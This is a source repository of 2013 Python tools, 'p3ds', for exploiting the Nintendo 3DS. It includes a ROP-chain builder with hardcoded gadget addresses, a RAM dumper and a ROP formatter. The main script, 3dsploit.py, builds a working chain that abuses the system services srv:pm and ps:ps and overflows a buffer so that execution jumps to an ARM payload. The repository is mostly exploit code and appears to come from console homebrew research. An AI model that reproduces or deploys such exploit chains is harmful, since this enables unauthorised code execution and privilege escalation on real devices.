├── .gitignore
├── 3dsploit.py
├── README.md
├── formatrop.py
├── p3ds
    ├── ROP.py
    ├── __init__.py
    └── util.py
└── ramdump.py


/.gitignore:
--------------------------------------------------------------------------------
 1 | *.py[cod]
 2 | 
 3 | # C extensions
 4 | *.so
 5 | 
 6 | # Packages
 7 | *.egg
 8 | *.egg-info
 9 | dist
10 | build
11 | eggs
12 | parts
13 | bin
14 | var
15 | sdist
16 | develop-eggs
17 | .installed.cfg
18 | lib
19 | lib64
20 | __pycache__
21 | 
22 | # Installer logs
23 | pip-log.txt
24 | 
25 | # Unit test / coverage reports
26 | .coverage
27 | .tox
28 | nosetests.xml
29 | 
30 | # Translations
31 | *.mo
32 | 
33 | # Mr Developer
34 | .mr.developer.cfg
35 | .project
36 | .pydevproject
37 | 


--------------------------------------------------------------------------------
/3dsploit.py:
--------------------------------------------------------------------------------
  1 | # 3dsploit.
  2 | # Copyright (C) 2013 naehrwert
  3 | # Copyright (C) 2013 oct0xor
  4 | # 
  5 | # This program is free software: you can redistribute it and/or modify
  6 | # it under the terms of the GNU General Public License as published by
  7 | # the Free Software Foundation, version 2.0.
  8 | # 
  9 | # This program is distributed in the hope that it will be useful,
 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | # GNU General Public License 2.0 for more details.
 13 | # 
 14 | # A copy of the GPL 2.0 should have been included with the program.
 15 | # If not, see http://www.gnu.org/licenses/
 16 | 
 17 | import sys
 18 | 
 19 | from p3ds.util import *
 20 | from p3ds.ROP import *
 21 | 
 22 | def request(r, id, req, port):
 23 | 	# Request setup.
 24 | 	r.pop_r4(0x279020)
 25 | 	r.i32(0x1C1958)
 26 | 	r.i32(0x44444444)
 27 | 	r.call_lr(0x10C2AC, [0x279024])
 28 | 	r.mov_r4_r0()
 29 | 	r.pop_r0(id)
 30 | 	r.pop_r1_r5_r6(req, port, 0x66666666)
 31 | 	# SendSyncRequest
 32 | 	r.call(0x12A640, [], 3)
 33 | 
 34 | def main(argv):
 35 | 	# Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0):
 36 | 	PAYLOAD = ""
 37 | 
 38 | 	r = ROP(0x002B0000)
 39 | 
 40 | 	# ConnectToPort(&port, "srv:pm");
 41 | 	r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")])
 42 | 
 43 | 	# sub_10CBC0()
 44 | 	r.call(0x105C88, [], 3)
 45 | 
 46 | 	# GetProcessId(&proc, 0xFFFF8001);
 47 | 	r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001])
 48 | 	
 49 | 	request(r, 0x04040040, Ref("proc"), Ref("port"))
 50 | 	request(r, 0x04030082, Ref("proc"), Ref("port"))
 51 | 
 52 | 	# sub_1B2130(&port, "ps:ps", 0x00000005)
 53 | 	r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5)
 54 | 
 55 | 	request(r, 0x20244, Ref("request"), Ref("port"))
 56 | 
 57 | 	r.i32(0x19FB09)
 58 | 
 59 | 	# Data.
 60 | 	r.label("srv:pm")
 61 | 	r.data("srv:pm\x00")
 62 | 	r.label("ps:ps")
 63 | 	r.data("ps:ps\x00")
 64 | 
 65 | 	# Port.
 66 | 	r.label("port")
 67 | 	r.data("\x00" * 0x04)
 68 | 
 69 | 	# Proc.
 70 | 	r.label("proc")
 71 | 	r.data(
 72 | 	"\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x18\x00")
 73 | 	r.i32(Ref("wat?"))
 74 | 	r.data("\x00" * 0x30)
 75 | 	r.label("wat?")
 76 | 	r.data(
 77 | 	"\x41\x50\x54\x3A\x55\x00\x00\x00\x79\x32\x72\x3A\x75\x00\x00\x00"
 78 | 	"\x67\x73\x70\x3A\x3A\x47\x70\x75\x6E\x64\x6D\x3A\x75\x00\x00\x00"
 79 | 	"\x66\x73\x3A\x55\x53\x45\x52\x00\x68\x69\x64\x3A\x55\x53\x45\x52"
 80 | 	"\x64\x73\x70\x3A\x3A\x44\x53\x50\x63\x66\x67\x3A\x75\x00\x00\x00"
 81 | 	"\x66\x73\x3A\x52\x45\x47\x00\x00\x70\x73\x3A\x70\x73\x00\x00\x00"
 82 | 	"\x6E\x73\x3A\x73\x00\x00\x00\x00\x61\x6D\x3A\x6E\x65\x74\x00\x00")
 83 | 	r.data("\x00" * 0xA0)
 84 | 
 85 | 	# Request.
 86 | 	r.label("request")
 87 | 	r.data("\x00" * 0x20)
 88 | 	r.data("\x00\x00\x00\x00\x02\x00\x82\x00")
 89 | 	r.i32(Ref("reqpart1"))
 90 | 	r.data("\x0A\x44\x07\x00") # 0x7440 << 4 | 0xA
 91 | 	r.i32(Ref("reqpart2"))
 92 | 	r.data("\x00" * 0x4C)
 93 | 	r.label("reqpart1")
 94 | 	r.data("\x00" * 0x200)
 95 | 	r.data("\x00\xA2\x03\x00")
 96 | 	r.data("\x00" * 0xFC)
 97 | 	r.label("reqpart2")
 98 | 	# length = 0x7440, return addr = 0x080C3EE0
 99 | 	r.data(PAYLOAD + struct.pack("<I", 0x080C3EE0) * (0x7440/4 - len(PAYLOAD)/4))
100 | 
101 | 	rop = r.gen()
102 | 
103 | 	#hexdump(rop, base=0x2B0000)
104 | 
105 | 	with open(argv[0], "wb") as f:
106 | 		f.write(rop)
107 | 
108 | if __name__ == "__main__":
109 | 	main(sys.argv[1:])
110 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | p3ds
2 | ====
3 | 
4 | 3DS python tools
5 | 


--------------------------------------------------------------------------------
/formatrop.py:
--------------------------------------------------------------------------------
 1 | # Hackityhack ROP formatter.
 2 | # Copyright (C) 2013 naehrwert
 3 | # 
 4 | # This program is free software: you can redistribute it and/or modify
 5 | # it under the terms of the GNU General Public License as published by
 6 | # the Free Software Foundation, version 2.0.
 7 | # 
 8 | # This program is distributed in the hope that it will be useful,
 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
11 | # GNU General Public License 2.0 for more details.
12 | # 
13 | # A copy of the GPL 2.0 should have been included with the program.
14 | # If not, see http://www.gnu.org/licenses/
15 | 
16 | import struct
17 | import darm # https://github.com/jbremer/darm
18 | 
19 | # Read RAM dump.
20 | dump = ""
21 | with open("DUMP.BIN", "rb") as f:
22 |     dump = f.read()
23 | 
24 | # Read decrypted launcher.
25 | data = ""
26 | with open("Launcher.dat", "rb") as f:
27 |     data = f.read()
28 | 
29 | # Format entries.
30 | for i in xrange(len(data)/4):
31 | 	v = struct.unpack("<I", data[i*4:i*4+4])[0]
32 | 	inst = ""
33 | 	if v >= 0x100000 and v <= 0x252000: # This is gonna work just fine.
34 | 		if v & 1:
35 | 			addr = (v - 0x100000) & 0xFFFFFFFE
36 | 			inst = darm.disasm_thumb(struct.unpack("<H", dump[addr:addr+2])[0])
37 | 		else:
38 | 			addr = v - 0x100000
39 | 			inst = darm.disasm_armv7(struct.unpack("<I", dump[addr:addr+4])[0])
40 | 		if inst == None:
41 | 			print "{0:08X}: {1:08X}".format(i*4, v)
42 | 		else:
43 | 			print "{0:08X}: {1:08X} - {2}".format(i*4, v, inst)
44 | 	else:
45 | 		print "{0:08X}: {1:08X}".format(i*4, v)
46 | 


--------------------------------------------------------------------------------
/p3ds/ROP.py:
--------------------------------------------------------------------------------
  1 | # 3DS ROP library (for DS user settings exploit).
  2 | # Copyright (C) 2013 naehrwert
  3 | # 
  4 | # This program is free software: you can redistribute it and/or modify
  5 | # it under the terms of the GNU General Public License as published by
  6 | # the Free Software Foundation, version 2.0.
  7 | # 
  8 | # This program is distributed in the hope that it will be useful,
  9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 11 | # GNU General Public License 2.0 for more details.
 12 | # 
 13 | # A copy of the GPL 2.0 should have been included with the program.
 14 | # If not, see http://www.gnu.org/licenses/
 15 | 
 16 | import struct
 17 | 
 18 | # Gadgets.
 19 | # Register loads.
 20 | _pop_pc = 0x001002F9
 21 | _pop_r0_pc = 0x00143D8C
 22 | _pop_r1_pc = 0x001C4FC4 #0x001549E1
 23 | _pop_r2_pc = 0x0022952D
 24 | _pop_r3_pc = 0x0010538C
 25 | _pop_r4_pc = 0x001001ED #0x001B3AA0
 26 | _pop_r1_r5_r6_pc = 0x001F1075
 27 | _pop_r4_to_r12_pc = 0x0018D5DC
 28 | _pop_r4_lr_bx_r2 = 0x001D9360
 29 | # Loads and stores.
 30 | _ldr_r0_r0_pop_r4_pc = 0x0012FBBC
 31 | _str_r1_r0_pop_r4_pc = 0x0010CCBC
 32 | # Stack pivoting.
 33 | _add_sp_r3_ldr_pc_sp_4 = 0x00143D60
 34 | 
 35 | # Functions.
 36 | #_memcpy = 0x001BFA64
 37 | 
 38 | class Ref:
 39 | 	def __init__(self, _name):
 40 | 		self.name = _name
 41 | 
 42 | class Data:
 43 | 	def __init__(self, _data):
 44 | 		m = len(_data) % 4
 45 | 		self.data = (_data + "\x00" * (4 - m) if m else _data)
 46 | 
 47 | class ROP:
 48 | 	def __init__(self, _base):
 49 | 		self.base = _base
 50 | 		self.addr = _base
 51 | 		self.stack = []
 52 | 		self.labels = {}
 53 | 
 54 | 	def _append(self, v):
 55 | 		self.stack.append(v)
 56 | 		self.addr += 4
 57 | 
 58 | 	def label(self, name):
 59 | 		self.labels[name] = self.addr
 60 | 
 61 | 	def ref(self, name):
 62 | 		self._append(Ref(name))
 63 | 
 64 | 	def data(self, data):
 65 | 		d = Data(data)
 66 | 		self.stack.append(d)
 67 | 		self.addr += len(d.data)
 68 | 
 69 | 	def i32(self, v):
 70 | 		self._append(v)
 71 | 
 72 | 	def pop_pc(self):
 73 | 		self._append(_pop_pc)
 74 | 
 75 | 	def pop_r0(self, r0):
 76 | 		self._append(_pop_r0_pc)
 77 | 		self._append(r0)
 78 | 
 79 | 	def pop_r1(self, r1):
 80 | 		self._append(_pop_r1_pc)
 81 | 		self._append(r1)
 82 | 
 83 | 	def pop_r2(self, r2):
 84 | 		self._append(_pop_r2_pc)
 85 | 		self._append(r2)
 86 | 
 87 | 	def pop_r3(self, r3):
 88 | 		self._append(_pop_r3_pc)
 89 | 		self._append(r3)
 90 | 
 91 | 	def pop_r4(self, r4):
 92 | 		self._append(_pop_r4_pc)
 93 | 		self._append(r4)
 94 | 
 95 | 	def pop_r1_r5_r6(self, r1, r5, r6):
 96 | 		self._append(_pop_r1_r5_r6_pc)
 97 | 		self._append(r1)
 98 | 		self._append(r5)
 99 | 		self._append(r6)
100 | 
101 | 	def pop_rX(self, **kwargs):
102 | 		regs = ['r4', 'r5', 'r6', 'r7', 'r8', 'r9', 'r10', 'r11', 'r12']
103 | 		values = [
104 | 			0x44444444, 0x55555555, 0x66666666, 
105 | 			0x77777777, 0x88888888, 0x99999999, 
106 | 			0xAAAAAAAA, 0xBBBBBBBB, 0xCCCCCCCC
107 | 		]
108 | 		for k, v in kwargs.items():
109 | 			if k not in regs:
110 | 				print "Wat? ({0})".format(k)
111 | 				return
112 | 			else:
113 | 				values[int(k[1:]) - 4] = v
114 | 		self._append(_pop_r4_to_r12_pc)
115 | 		for v in values:
116 | 			self._append(v)
117 | 
118 | 	def pop_lr(self, addy):
119 | 		self.pop_r2(_pop_pc)
120 | 		self._append(_pop_r4_lr_bx_r2)
121 | 		self._append(0x44444444)
122 | 		self._append(addy)
123 | 
124 | 	def load_r0(self, addy):
125 | 		self.pop_r0(addy)
126 | 		self._append(_ldr_r0_r0_pop_r4_pc)
127 | 		self._append(0x44444444)
128 | 
129 | 	def store_r1(self, addy):
130 | 		self.pop_r0(addy)
131 | 		self._append(_str_r1_r0_pop_r4_pc)
132 | 		self._append(0x44444444)
133 | 
134 | 	def store_i32(self, value, addy):
135 | 		self.pop_r1(value)
136 | 		self.store_r1(addy)
137 | 
138 | 	def call(self, fun, args, cleancnt):
139 | 		pops = [_pop_r0_pc, _pop_r1_pc, _pop_r2_pc, _pop_r3_pc]
140 | 		if len(args) > 4:
141 | 			print "Nahhhh, not now, maybe later ({0})".format(args)
142 | 			return
143 | 		for i in xrange(len(args)):
144 | 			self._append(pops[i])
145 | 			self._append(args[i])
146 | 		self._append(fun)
147 | 		for i in xrange(cleancnt):
148 | 			self._append(0xDEADBEEF)
149 | 
150 | 	def call_lr(self, fun, args):
151 | 		pops = [_pop_r0_pc, _pop_r1_pc, _pop_r2_pc, _pop_r3_pc]
152 | 		if len(args) > 4:
153 | 			print "Nahhhh, not now, maybe later ({0})".format(args)
154 | 			return
155 | 		self.pop_lr(_pop_pc)
156 | 		for i in xrange(len(args)):
157 | 			self._append(pops[i])
158 | 			self._append(args[i])
159 | 		self._append(fun)
160 | 
161 | 	def mov_r4_r0(self):
162 | 		# 0x001B4F0C: adds r4, r0, r5; subs r4, r4, r7; movs r0, r4; blx r6
163 | 		self.pop_rX(r5 = 0, r6 = _pop_pc, r7 = 0)
164 | 		self._append(0x1B4F0D)
165 | 
166 | #	def memcpy(self, dst, src, size):
167 | #		self.call(_memcpy, [dst, src, size], 7)
168 | 
169 | 	def pivot(self, size): #TODO: test this	
170 | 		self.pop_r3(size)
171 | 		self._append(_add_sp_r3_ldr_pc_sp_4)
172 | 
173 | 	def gen(self):
174 | 		res = ""
175 | 		for s in self.stack:
176 | 			if isinstance(s, Ref):
177 | 				res += struct.pack("<I", self.labels[s.name])
178 | 			elif isinstance(s, Data):
179 | 				res += s.data
180 | 			else:
181 | 				res += struct.pack("<I", s)
182 | 		return res
183 | 


--------------------------------------------------------------------------------
/p3ds/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/naehrwert/p3ds/af94d34f1793516a88e93e97303412e6d4e69b0e/p3ds/__init__.py


--------------------------------------------------------------------------------
/p3ds/util.py:
--------------------------------------------------------------------------------
 1 | def hexdump(src, base=0, length=16, sep='.'):
 2 | 	FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or sep for x in range(256)])
 3 | 	lines = []
 4 | 	for c in xrange(0, len(src), length):
 5 | 		chars = src[c:c+length]
 6 | 		hex = ' '.join(["%02x" % ord(x) for x in chars])
 7 | 		if len(hex) > 24:
 8 | 			hex = "%s %s" % (hex[:24], hex[24:])
 9 | 		printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or sep) for x in chars])
10 | 		lines.append("%08X: %-*s |%s|\n" % (base + c, length*3, hex, printable))
11 | 	print ''.join(lines)
12 | 


--------------------------------------------------------------------------------
/ramdump.py:
--------------------------------------------------------------------------------
 1 | # Example RAM dumper.
 2 | # Copyright (C) 2013 naehrwert
 3 | # 
 4 | # This program is free software: you can redistribute it and/or modify
 5 | # it under the terms of the GNU General Public License as published by
 6 | # the Free Software Foundation, version 2.0.
 7 | # 
 8 | # This program is distributed in the hope that it will be useful,
 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
11 | # GNU General Public License 2.0 for more details.
12 | # 
13 | # A copy of the GPL 2.0 should have been included with the program.
14 | # If not, see http://www.gnu.org/licenses/
15 | 
16 | import sys
17 | 
18 | from p3ds.util import *
19 | from p3ds.ROP import *
20 | 
21 | def main(argv):
22 | 	r = ROP(0x002B0000)
23 | 
24 | 	# Set file object u64 offset to 0
25 | 	r.store_i32(0, 0x279004)
26 | 	r.store_i32(0, 0x279008)
27 | 
28 | 	# file_open(0x279000, "YS:/DUMP.BIN", 6)
29 | 	r.call(0x1B82AC, [0x279000, Ref("fname"), 6], 5)
30 | 	# file_write(0x279000, 0x279020, 0x100000, 0x300000)
31 | 	r.call(0x1B3B54, [0x279000, 0x279020, 0x100000, 0x300000], 9)
32 | 
33 | 	# Data.
34 | 	r.label("fname")
35 | 	r.data("YS:/DUMP.BIN".encode('utf-16le') + "\x00\x00")
36 | 
37 | 	rop = r.gen()
38 | 	
39 | 	#hexdump(rop, base=0x2B0000)
40 | 
41 | 	with open(argv[0], "wb") as f:
42 | 		f.write(rop)
43 | 
44 | if __name__ == "__main__":
45 | 	main(sys.argv[1:])
46 | 


--------------------------------------------------------------------------------